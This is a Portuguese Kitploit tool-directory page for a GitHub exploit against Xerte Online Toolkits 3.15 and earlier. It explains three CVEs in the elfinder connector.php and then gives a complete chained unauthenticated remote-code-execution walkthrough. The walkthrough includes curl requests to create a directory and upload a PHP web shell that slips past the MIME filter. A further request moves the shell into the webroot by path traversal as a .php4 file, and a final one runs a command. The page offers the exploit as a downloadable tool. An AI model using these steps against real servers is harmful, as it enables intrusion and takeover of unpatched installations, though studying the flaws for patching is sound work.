Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
xerteonlinetoolkits-rce — Exploit não autenticado do Xerte Online Toolkits. Requer conhecer um nome de usuário válido. | Kitploit
Ferramentas/GitHubGitHub/bootstrapbool/xerteonlinetoolkits-rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubbootstrapbool/xerteonlinetoolkits-rce

xerteonlinetoolkits-rce

Exploit não autenticado do Xerte Online Toolkits. Requer conhecer um nome de usuário válido.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
há 3 mesesAinda não revisado
Compartilhar

Xerte Online Toolkits <= 3.15 Execução Remota de Código

As versões 3.15 e anteriores do Xerte Online Toolkits sofrem de 3 vulnerabilidades no componente /editor/elfinder/php/connector.php, que podem ser encadeadas por um atacante não autenticado para alcançar Execução Remota de Código (RCE).

Versões Afetadas

Xerte Online Toolkits <= 3.15

Um patch retroportado foi aplicado às versões 3.15, 3.14 e 3.13

CWE-306: Ausência de Autenticação para Função Crítica - CVE-2026-34413

Usuários não autenticados podem fazer requisições ao componente connector em /editor/elfinder/php/connector.php

O código a seguir é usado como controle de acesso.

Arquivo: /editor/elfinder/php/connector.php Número da Linha: 35

root@kitploit:~
if (!isset($_SESSION['toolkits_logon_id'])){
    header("location: ../../../index.php");
}

Isso redireciona usuários não autenticados, impedindo-os de receber a resposta de requisições não autenticadas; no entanto, isso não encerra a sessão e o código subsequente ainda é executado.

CWE-23: Travessia de Caminho Relativa - CVE-2026-34414

*Requer que o atacante saiba o nome do arquivo que deseja mover

Atacantes podem manipular o parâmetro "name" em uma requisição "rename" para o endpoint connector.php. Isso permite que atacantes usem um diretório existente para mover arquivos para fora do diretório de mídia do usuário.

CWE-184: Lista Incompleta de Entradas Não Permitidas - CVE-2026-34415

Devido a um erro na regex do filtro de extensão de arquivo no connector.php, atacantes podem encadear uma vulnerabilidade de travessia de caminho presente nas mesmas versões do Xerte para mover um arquivo com código PHP malicioso para a raiz da aplicação com extensão .php4.

Arquivo: /editor/elfinder/php/connector.php Número da Linha: 130

root@kitploit:~
array( // hide readmes
    'pattern' => '/(readme\.txt)|\.(html|php|php5|php*|phtml|phar|inc|py|pl|sh)$/i',
    'read'   => false,

A regex php* apenas corresponde ao caractere anterior. Portanto, ela corresponderia a "ph", "php", "phppp", etc...

Passos para Reprodução do Vetor de Ataque Encadeado

Execução Remota de Código Não Autenticada

Se a autenticação estiver habilitada (o que não é a configuração padrão do Xerte), um atacante precisa saber (ou descobrir por força bruta) o nome de usuário de um usuário válido. Se a autenticação de Convidado for usada (o padrão), o diretório do projeto alvo seria simplesmente 1--Nottingham.

Um atacante não autenticado pode criar um diretório "example_dir" e enviar um arquivo "file.txt" com código PHP malicioso para qualquer diretório de projeto em USER-FILES/

Em seguida, eles podem usar as vulnerabilidades de Travessia de Caminho Relativa e Lista Incompleta de Entradas Não Permitidas presentes no Xerte para realizar uma travessia de caminho alterando o nome do arquivo enviado para "example_dir/../../../../file.php4", movendo file.txt para a raiz da aplicação como "file.php4", o que concede ao atacante execução remota de código.

  1. Obtenha o caminho completo da raiz da aplicação
root@kitploit:~
curl 'http://localhost/xt/setup'
  1. Crie o diretório

Parâmetros da Requisição: uploadDir: Raiz da aplicação + USER-FILES/{project id}-{user}-Nottingham/ uploadURL: URL para o diretório do projeto cmd: mkdir name: O nome do novo diretório target: O id elfinder do diretório media/. Por ser a raiz do elfinder, será sempre "l1_Lw"

root@kitploit:~
curl 'http://localhost/xt/editor/elfinder/php/connector.php?uploadDir=/opt/lampp/htdocs/xt/USER-FILES/1-user2-Nottingham/&uploadURL=http://localhost/xt/USER-FILES/1-user2-Nottingham/&cmd=mkdir&name=folder1&target=l1_Lw'
  1. Envie o arquivo php malicioso

*A tag
no payload impede que o filtro de tipo MIME do elfinder detecte código PHP.

Parâmetros da Requisição: uploadDir: Raiz da aplicação + USER-FILES/{project id}-{user}-Nottingham/ uploadURL: URL para o diretório do projeto cmd: upload target: O id elfinder do diretório media/. Por ser a raiz do elfinder, será sempre "l1_Lw" upload[]: O arquivo a ser enviado.

root@kitploit:~
echo '<br><?php system($_GET["cmd"]); ?>' > file.txt
curl -X POST 'http://localhost/xt/editor/elfinder/php/connector.php?uploadDir=/opt/lampp/htdocs/xt/USER-FILES/1-user2-Nottingham/&uploadURL=http://localhost/xt/USER-FILES/1-user2-Nottingham/' \
    -F 'cmd=upload' \
    -F 'target=l1_Lw' \
    -F "upload[][email protected];type=text/plain"
  1. Gere o id elfinder para o novo arquivo
root@kitploit:~
echo -n 'file.txt' | base64
ZmlsZS50eHQ=

Certifique-se de remover o padding; neste caso, é apenas "="

Adicione o identificador de volume. Ele será sempre "l1" (como em "/")

Resultado: l1_ZmlsZS50eHQ

  1. Renomeie o arquivo e realize a Travessia de Caminho Relativa

Parâmetros da Requisição: uploadDir: Raiz da aplicação + USER-FILES/{project id}-{user}-Nottingham/ uploadURL: URL para o diretório do projeto cmd: rename name: O nome do diretório, a sequência de travessia de caminho e o novo nome do arquivo com extensão .php4 target: O id elfinder que geramos a partir do novo arquivo l1_ZmlsZS50eHQ

root@kitploit:~
curl 'http://localhost/xt/editor/elfinder/php/connector.php?uploadDir=/opt/lampp/htdocs/xt/USER-FILES/1-user2-Nottingham/&uploadURL=http://localhost/xt/USER-FILES/1-user2-Nottingham/&cmd=rename&name=folder1%2F..%2F..%2F..%2F..%2Fs.php4&target=l1_ZmlsZS50eHQ'
  1. Verifique a execução de código

Parâmetros da Requisição: cmd: O comando a ser executado

root@kitploit:~
curl http://localhost/xt/s.php4?cmd=id
<br>uid=1(daemon) gid=1(daemon) groups=1(daemon)
Baixar ferramenta